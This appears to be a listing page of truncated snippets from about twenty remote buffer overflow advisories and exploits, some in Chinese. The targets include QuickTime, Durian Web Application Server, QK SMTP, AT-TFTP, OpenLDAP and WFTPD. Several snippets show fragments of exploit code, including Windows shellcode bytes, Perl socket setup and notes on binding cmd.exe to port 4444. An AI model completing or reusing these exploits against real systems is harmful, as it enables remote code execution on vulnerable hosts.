Apple QuickTime RTSP URI远程缓冲区溢出漏洞

Apple QuickTime是一款流行的媒体播放程序。 Apple QuickTime处理RTSP URI存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 问题存在于rtsp:// URL处理器上，通过提供特殊的字符串rtsp://随机+ 冒号 + 299 字节填充和负载，使用HTML, Javascript或者QTL文件诱使用户解析，可导致基于堆栈的缓冲区溢出，可导致任意指令执行。 Apple QuickTime Player 7.1.3 目前没有解决方案提供： http://www.apple.com/quicktime/ !/usr/bin/ruby...

Durian Web Application Server远程缓冲区溢出漏洞

Durian Web Application Server是一款WEB应用服务程序。 Durian Web Application Server不正确处理畸形请求，远程攻击者可以利用漏洞对应用程序进行拒绝服务或缓冲区溢出攻击。 提交超长请求可导致缓冲区溢出，或者提交畸形请求可显示1000个访问冲突对话框而造成拒绝服务攻击。 Durian Web Application Server 3.02 目前没有解决方案提供： http://sourceforge.net/projects/durian/ //Durian Web Application Server 3.02 freeware f...

Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow

!/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropriate jump address. Certain characters are not permitted in the shellcode...

QK SMTP 3.01 - RCPT TO Remote Buffer Overflow (2)

QK SMTP 3.01 - RCPT TO Remote Buffer Overflow 2 !/bin/perl https://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit...

QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)

Exploit for unknown platform in category remote exploits ============================================================= QK SMTP = 3.01 RCPT TO Remote Buffer Overflow Exploit pl ============================================================= !/bin/perl http://www.securityfocus.com/bid/20681 tested on...

Durian Web Application Server 3.02 - Remote Buffer Overflow

Durian Web Application Server 3.02 - Remote Buffer Overflow http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec,...

Durian Web Application Server 3.02 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================= Durian Web Application Server 3.02 Remote Buffer Overflow Exploit ================================================================= http://sourceforge.net/projects/durian/ /...

Durian Web Application Server 3.02 - Remote Buffer Overflow

http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...

KsIRC 1.3.12 - PRIVMSG Remote Buffer Overflow (PoC)

KsIRC 1.3.12 - PRIVMSG Remote Buffer Overflow PoC // KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC // // Federico L. Bossi Bonin // [email protected] // www.GlobalST.com.ar // 0 0xb7ea8792 in KSircIOController::stdoutread from /usr/kde/3.5/lib/libkdeinitksirc.so // 1 0xb7ea78c8 in...

OpenLDAP 2.4.3 - &#039;KBIND&#039; Remote Buffer Overflow

/ openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. / include include include include include...

LS-20061001 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability

LS-20061001 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine...

NetBSD Ftpd和Tnftpd移植远程缓冲区溢出漏洞

tnftpd是一款NetBSD FTP服务程序的移植版本。 NetBSD tnftpd存在远程堆栈溢出问题，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 要触发此漏洞，攻击者必须建立文件夹和使用GLOB特殊字符如星号来溢出内部堆栈缓冲区，精心构建提交数据可能以进程权限执行任意指令。 tnftpd tnftpd 20040810 NetBSD NetBSD 3.0 目前没有解决方案提供： http://freshmeat.net/projects/tnftpd !perl $$$ NetBSD ftpd and ports Remote ROOOOOT $HOLE$ $$$...

AT-TFTP &lt;= 1.9 (Long Filename) Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='udp',...

Allied Telesyn TFTP (AT-TFTP) ServerDaemon 1.9 - Filename Remote Buffer Overflow

Allied Telesyn TFTP AT-TFTP ServerDaemon 1.9 - Filename Remote Buffer Overflow !/usr/bin/perl -w acaroatjervus.it https://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl \n\n"; exit; $victim =...

Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - &#039;Filename&#039; Remote Buffer Overflow

!/usr/bin/perl -w acaroatjervus.it https://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "Cann...

Evince Document Viewer - &#039;DocumentMedia&#039; Remote Buffer Overflow

/ Creator: K-sPecial xzziroz.net of .aware awarenetwork.org Name: evince-ps-field-bof.c Date: 11/27/2006 Version: 1.00 - creation Other: this idea originaly came from the bid for the 'gv' buffer overflow 20978, i don't believe it's known until now that evince is also vulnerable. Compile: gcc -o...

LS-20061113 - CA BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability

LS-20061113 LSsec has discovered a vulnerability in Computer Associates BrightStor ARCserve Backup v11.5, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The flaw specifically exists within the Tape Engine...

Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow

Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow // source: https://www.securityfocus.com/bid/21220/info Novell Client is prone to a remote buffer-overflow vulnerability. Successful exploits may result in a denial-of-service condition or arbitrary code execution. Remote, anonymous attacker...

proftpd -- remote code execution vulnerabilities

The proftpd development team reports that several remote buffer overflows had been found in the proftpd server...

WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC

No description provided by source. !/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow Only a DOS currently, simple POC" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP print "+...